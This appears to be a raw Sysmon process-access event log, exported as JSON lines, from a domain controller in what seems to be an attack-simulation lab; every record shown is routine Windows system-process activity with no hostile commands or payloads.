{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":944,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":945,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.678\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2108\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010546B0100}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.678","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2108","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010546B0100}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":946,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.678\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010546B0100}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.678","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010546B0100}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":947,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.678\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010F66D0100}\r\nTargetProcessId: 2320\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.678","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010F66D0100}","TargetProcessId":"2320","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":948,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.709\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nSourceProcessId: 1196\r\nSourceThreadId: 1908\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.709","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","SourceProcessId":"1196","SourceThreadId":"1908","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":949,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.709\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nSourceProcessId: 1196\r\nSourceThreadId: 1908\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.709","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","SourceProcessId":"1196","SourceThreadId":"1908","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":950,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.709\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nSourceProcessId: 1196\r\nSourceThreadId: 1908\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.709","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","SourceProcessId":"1196","SourceThreadId":"1908","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":951,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.740\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2108\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.740","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2108","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":952,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.740\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nSourceProcessId: 1196\r\nSourceThreadId: 1908\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.740","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","SourceProcessId":"1196","SourceThreadId":"1908","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":953,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.740\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nSourceProcessId: 1196\r\nSourceThreadId: 1908\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.740","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","SourceProcessId":"1196","SourceThreadId":"1908","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":954,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.756\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 